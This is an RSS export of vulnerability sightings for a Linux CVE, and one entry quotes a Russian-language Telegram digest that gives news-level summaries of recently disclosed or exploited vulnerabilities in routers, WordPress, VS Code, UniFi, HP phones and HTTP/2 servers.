https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Wed, 10 Jun 2026 05:21:41 +0000 https://vulnerability.circl.lu/sighting/2daaee5a-0b45-4266-8636-7e0e08a2f1f9/export {"uuid": "2daaee5a-0b45-4266-8636-7e0e08a2f1f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/5KTwmA96Kj45TkZqBYLm7RQJ-3Dt3Yk-Ro8oNdfED5lawJI", "content": "", "creation_timestamp": "2026-06-03T15:00:06.000000Z"} {"uuid": "2daaee5a-0b45-4266-8636-7e0e08a2f1f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/5KTwmA96Kj45TkZqBYLm7RQJ-3Dt3Yk-Ro8oNdfED5lawJI", "content": "", "creation_timestamp": "2026-06-03T15:00:06.000000Z"} https://vulnerability.circl.lu/sighting/2daaee5a-0b45-4266-8636-7e0e08a2f1f9/export Wed, 03 Jun 2026 15:00:06 +0000 https://vulnerability.circl.lu/sighting/87454edc-0362-4000-9231-ea207a52fd71/export {"uuid": "87454edc-0362-4000-9231-ea207a52fd71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/true_secator/8277", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b:\n\n1. Acer \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435\u043c \u0434\u0432\u0443\u0445 0-day \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 \u0435\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 \u0441 mesh-\u0441\u0435\u0442\u044c\u044e Wave 7, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0435 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0432\u0435\u0440\u0441\u0438\u0438 T7c_GBL_1.01.000055 \u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439.\n\n\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0413\u0435\u0440\u0433\u043e \u041f\u0430\u043f. \u041f\u0435\u0440\u0432\u0430\u044f CVE-2026-49200 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0435\u0442\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435, \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u043c\u0441\u044f \u0432 \u0430\u0440\u0445\u0438\u0432\u0430\u0445 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2026-49201 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043a\u043b\u044e\u0447\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0431\u0435\u0437 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0434\u043e\u0440.\n\n2. \u0425\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 (CVE-2026-8206) \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 Kirki - Freeform Page Builder, Website Builder & Customizer \u0434\u043b\u044f WordPress \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432.\n\n\u0410\u0442\u0430\u043a\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b Defiant, \u0447\u0435\u0439 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u044d\u043a\u0440\u0430\u043d Wordfence \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b \u0431\u043e\u043b\u0435\u0435 222 \u043f\u043e\u043f\u044b\u0442\u043e\u043a\u00a0\u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 24 \u0447\u0430\u0441\u0430. CVE-2026-8206 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0438 REST API \u0434\u043b\u044f \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0430\u0440\u043e\u043b\u044f \u0447\u0435\u0440\u0435\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u044e 'handle_forgot_password()'.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c \u043d\u0430 500 000 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432, \u043e\u0431\u044a\u0435\u043c\u044b \u0440\u0430\u0431\u043e\u0442\u044b \u0443 \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f \u0438\u043c\u0435\u044e\u0442\u0441\u044f. \n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c\u00a0Wordfence, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0432 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u043c \u043a\u0440\u0443\u043f\u043d\u043e\u043c \u0440\u0435\u043b\u0438\u0437\u0435, \u0432\u0435\u0440\u0441\u0438\u0438 6.0.0, \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 \u0434\u043e 6.0.6 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043a\u043e\u0442\u043e\u0440\u044b\u0435, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a\u00a0\u0441 WordPress, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u043e\u0447\u0442\u0438 40% \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043b\u0430\u0433\u0438\u043d\u0430.\n\n3. \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft \u0431\u0435\u0437 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u044f. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0410\u043c\u043c\u0430\u0440 \u0410\u0441\u043a\u0430\u0440 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 (GitHub), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043e\u0434\u043d\u0438\u043c \u0449\u0435\u043b\u0447\u043a\u043e\u043c \u043c\u044b\u0448\u0438 \u0443\u043a\u0440\u0430\u0441\u0442\u044c \u0442\u043e\u043a\u0435\u043d\u044b GitHub \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440 Visual Studio Code.\n\n\u041f\u0440\u0438\u0447\u0435\u043c, \u043a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0430\u0445 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft \u0431\u044b\u043b\u0438 \u043f\u0440\u043e\u0438\u0433\u043d\u043e\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u0431\u0435\u0437 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0439 \u0438\u043b\u0438 \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u0438\u044f.\n\n4. BishopFox \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0438\u00a0\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f CVE-2026-22557, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0439 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u043f\u0440\u0438 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Ubiquiti UniFi.\n\n5. HP \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0434\u043b\u044f \u0441\u0432\u043e\u0438\u0445 VoIP-\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u043e\u0432 \u0441\u0435\u0440\u0438\u0438 VVX, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-0826, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430\u0445 \u0431\u0435\u0437 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Rapid7, \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445, \u0433\u0434\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f.\n\n6. Positive Technologies \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0441\u0432\u043e\u0439 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u043c\u0430\u0439\u0441\u043a\u0438\u0439 \u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 \u0412 \u0442\u0440\u0435\u043d\u0434\u0435 VM, \u0443\u043a\u0430\u0437\u0430\u0432 \u0433\u0440\u043e\u043c\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Linux (CVE-2026-31431), ActiveMQ (CVE-2026-34197), SharePoint (CVE-2026-32201) \u0438 Acrobat Reader (CVE-2026-34621).\n\n7. CISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux CVE-2022-0492 (CVSS 7,8) \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u0445\u043e\u0434\u0443 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432. \u041e\u043d\u0430 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u043e\u0431\u043e\u0439\u0442\u0438 \u0438\u0437\u043e\u043b\u044f\u0446\u0438\u044e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d.\n\n8. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0438\u043f\u0430 HTTP/2 Bomb \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0437\u0430 \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u043a\u0443\u043d\u0434\u044b.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Calif \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b DoS-\u0430\u0442\u0430\u043a \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u044b \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u0432 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\nHTTP/2 Bomb \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Codex \u043e\u0442 OpenAI \u0438 \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u0432 \u0441\u0435\u0431\u0435 \u0431\u043e\u043c\u0431\u0443 \u0441\u0436\u0430\u0442\u0438\u044f, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u0443\u044e \u043d\u0430 \u0441\u0445\u0435\u043c\u0443 \u0441\u0436\u0430\u0442\u0438\u044f \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u043e\u0432 HTTP/2 (HPACK), \u0441 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0432 \u0441\u0442\u0438\u043b\u0435 Slowloris, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044e \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c.\n\n\u0410\u0442\u0430\u043a\u0430 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 880 000 \u0441\u0430\u0439\u0442\u043e\u0432, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 HTTP/2 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439 NGINX, Apache HTTPD, Microsoft IIS, Envoy \u0438\u043b\u0438 Cloudflare Pingora.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0430 \u0441 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0440\u0438 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f 100 \u041c\u0431\u0438\u0442/\u0441 \u0438 \u0432 \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u043a\u0443\u043d\u0434\u044b \u0432\u044b\u0432\u0435\u0441\u0442\u0438 \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u043b\u044e\u0431\u043e\u0439 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.", "creation_timestamp": "2026-06-03T18:30:06.000000Z"} {"uuid": "87454edc-0362-4000-9231-ea207a52fd71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/true_secator/8277", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b:\n\n1. Acer \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435\u043c \u0434\u0432\u0443\u0445 0-day \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 \u0435\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 \u0441 mesh-\u0441\u0435\u0442\u044c\u044e Wave 7, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0435 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0432\u0435\u0440\u0441\u0438\u0438 T7c_GBL_1.01.000055 \u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439.\n\n\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0413\u0435\u0440\u0433\u043e \u041f\u0430\u043f. \u041f\u0435\u0440\u0432\u0430\u044f CVE-2026-49200 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0435\u0442\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435, \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u043c\u0441\u044f \u0432 \u0430\u0440\u0445\u0438\u0432\u0430\u0445 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2026-49201 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043a\u043b\u044e\u0447\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0431\u0435\u0437 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0434\u043e\u0440.\n\n2. \u0425\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 (CVE-2026-8206) \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 Kirki - Freeform Page Builder, Website Builder & Customizer \u0434\u043b\u044f WordPress \u0434\u043b\u044f 